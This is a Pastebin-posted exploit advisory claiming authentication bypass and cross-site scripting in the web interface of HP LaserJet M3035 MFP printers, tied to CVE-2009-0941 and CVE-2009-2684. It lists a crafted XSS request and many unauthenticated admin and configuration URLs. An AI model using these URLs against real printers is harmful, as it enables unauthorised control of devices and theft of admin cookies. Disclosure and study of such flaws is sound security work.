API tools faq
paste
Advertisement
KingSkrupellos

HP LaserJet M3035 MFP Series Printers 6.7.0 Auth Bypass XSS

KingSkrupellos
Apr 3rd, 2019
180
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.36 KB | None | 0 0
raw download clone embed print report
  1. ############################################################################################
  2.  
  3. # Exploit Title : HP LaserJet M3035 MFP Series Printers 6.7.0.x Authentication Bypass - Cross Site Scripting
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 04/04/2019
  7. # Vendor Homepage : hp.com
  8. # Software Information Link :
  9. support.hp.com/us-en/drivers/selfservice/hp-laserjet-m3035-multifunction-printer-series/2512333
  10. # Software Version :
  11. Driver-Universal Print Driver for Managed Services => 6.7.0.23989
  12. Driver-Universal Print Driver => 6.1.0.20062 - 6.7.0.23989
  13. Software Universal Printer Driver => 1.8.6
  14. Device Model => CB415A
  15. HP PC Send Fax Driver => Version 61.063.666.41
  16. Driver USB Version => 7.0.0.29
  17. Firmware => 48.430.1
  18. Software Universal Printer Version => 1.8.6
  19. # Tested On : Windows and Linux
  20. # Category : Hardware
  21. # Exploit Risk : High / Medium
  22. # Common Vulnerability Enumeration :
  23. CVE-2009-0941
  24. CVE-2009-2684
  25. # Vulnerability Type :
  26. CWE-306 [ Missing Authentication for Critical Function ]
  27. CWE-592 [ Authentication Bypass ]
  28. CWE-287 [ Improper Authentication ]
  29. CWE-79 [ Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') ]
  30. CWE-264 [ Permissions, Privileges, and Access Controls ]
  31. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  32. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  33. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  34.  
  35. ############################################################################################
  36.  
  37. # Description about Software :
  38. ***************************
  39. HP LaserJet as a brand name identifies the line of dry electrophotographic DEP laser printers marketed by the American
  40.  
  41. computer company Hewlett-Packard (HP). The HP LaserJet was the world's first desktop laser printer.
  42.  
  43. ############################################################################################
  44.  
  45. # Impact :
  46. ***********
  47. Authentication Bypass / Missing Authentication For Critical Function :
  48. ************************************************************
  49. When an actor claims to have a given identity, the software does not prove or insufficiently proves that the claim is correct.
  50.  
  51. Remote attackers can edit - delete and access files and administrative access without real administrator permission.
  52.  
  53. Remote attackers can bypass this because the system doesn't ask admin username and password.
  54.  
  55. The software does not perform any authentication for functionality that requires a provable user identity
  56.  
  57. or consumes a significant amount of resources.
  58.  
  59. The vulnerability allows a remote unauthenticated attacker to send specially crafted HTTP request to the
  60.  
  61. affected application and change configuration settings or gain administrative access.
  62.  
  63. Missing authentication for critical function is a language independent issue that can appear in any multiuser environment.
  64.  
  65. Developing a fix would require understanding of the current application security model and implemented access controls.
  66.  
  67. Three basic rules however can help you eliminate potential improper authorization issues:
  68.  
  69. 1) Identify all privileged assets within your application (web pages that display sensitive data,
  70. website sections that contain privileged/administrative functionality, etc.)
  71.  
  72. 2) Identify user roles within the application and their access permissions
  73.  
  74. 3) Always check if the user should have privileges to access the asset.
  75.  
  76. XSS Cross Site Scripting Impact /Prevention :
  77. ****************************************
  78. HP LaserJet M3035 MFP Series are prone to a cross-site scripting vulnerability
  79. because it fails to sufficiently sanitize user-supplied data.
  80.  
  81. A remote user can access the target user's cookies (including authentication cookies),
  82. if any, associated with the HP Printer interface, access data recently submitted by the
  83. target user via web form to the site, or take actions on the site acting as the target user.
  84.  
  85. Cross-site scripting vulnerability in HP Jetdirect and the Embedded Web Server (EWS)
  86. on certain HP LaserJet and Color LaserJet printers allow remote attackers to
  87. inject arbitrary web script or HTML via the (1) Product_URL or (2) Tech_URL parameter in an
  88. Apply action to the support_param.html/config script.
  89.  
  90. Prevention of XSS Vulnerability :
  91. ****************************
  92. set the administrator password
  93. use a new browser instance for administrator tasks
  94. do not access other web sites while performing administrator tasks
  95. exit the browser when administrator tasks are complete
  96.  
  97. According to the CVE-2009-0941 =>
  98. *********************************
  99. The HP Embedded Web Server (EWS) on HP LaserJet Printers, Edgeline Printers, and Digital Senders
  100. has no management password by default, which makes it easier for remote attackers to obtain access.
  101.  
  102. According to the CVE-2009-2684 =>
  103. *********************************
  104. Multiple cross-site scripting (XSS) vulnerabilities in Jetdirect and the Embedded Web Server (EWS) on
  105. certain HP LaserJet and Color LaserJet printers, and HP Digital Senders, allow remote attackers to
  106. inject arbitrary web script or HTML via the (1) Product_URL or (2) Tech_URL parameter
  107. in an Apply action to the support_param.html/config script.
  108.  
  109. ############################################################################################
  110.  
  111. XSS Cross Site Scripting Exploit :
  112. *******************************
  113. https://[targetipaddress]/support_param.html/config?Admin_Name=&Admin_Phone=&Product_URL=[XSS]&Tech_URL=[XSS]&Apply=Apply
  114.  
  115. It returns as " /success_result.htm/config "
  116.  
  117. Configuration Successfully Done.
  118.  
  119. # Authentication Bypass Exploit / Vulnerability :
  120. *******************************************
  121. https://[targetipaddress]/hp/device/this.LCDispatcher
  122.  
  123. https://[targetipaddress]/hp/device/this.LCDispatcher?nav=hp.EmailServer
  124.  
  125. https://[targetipaddress]/hp/device/this.LCDispatcher?nav=hp.Alerts&subpage=1&lstid=-1
  126.  
  127. https://[targetipaddress]/hp/device/this.LCDispatcher?nav=hp.Alerts&subpage=3&lstid=1
  128.  
  129. https://[targetipaddress]/hp/device/this.LCDispatcher?nav=hp.Alerts
  130.  
  131. https://[targetipaddress]/hp/device/this.LCDispatcher?nav=hp.AutoSend
  132.  
  133. https://[targetipaddress]/hp/device/this.LCDispatcher?nav=hp.Security&fldPage=0
  134.  
  135. https://[targetipaddress]/hp/device/this.LCDispatcher?nav=hp.OtherLinks
  136.  
  137. https://[targetipaddress]/hp/device/this.LCDispatcher?nav=hp.Config
  138.  
  139. https://[targetipaddress]/hp/device/this.LCDispatcher?nav=hp.DeviceInfoConfig
  140.  
  141. https://[targetipaddress]/hp/device/Auth/set_config_deviceinfo.htm
  142.  
  143. https://[targetipaddress]/hp/device/info_configuration.htm
  144.  
  145. https://[targetipaddress]/hp/jetdirect
  146.  
  147. https://[targetipaddress]/config_pro.htm
  148. https://[targetipaddress]/tcpipv6.htm
  149. https://[targetipaddress]/tcpipv4.htm
  150.  
  151. https://[targetipaddress]/tcp_param.htm
  152. https://[targetipaddress]/network_id.htm
  153.  
  154. https://[targetipaddress]/tcp_summary.htm
  155. https://[targetipaddress]/index_info.htm
  156.  
  157. https://[targetipaddress]/support_param.html
  158. https://[targetipaddress]/support.htm
  159.  
  160. https://[targetipaddress]/tcp_diag.htm
  161. https://[targetipaddress]/configpage.htm
  162.  
  163. https://[targetipaddress]/tcp_param.htm
  164. https://[targetipaddress]/network_id.htm
  165.  
  166. ############################################################################################
  167.  
  168. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  169.  
  170. ############################################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!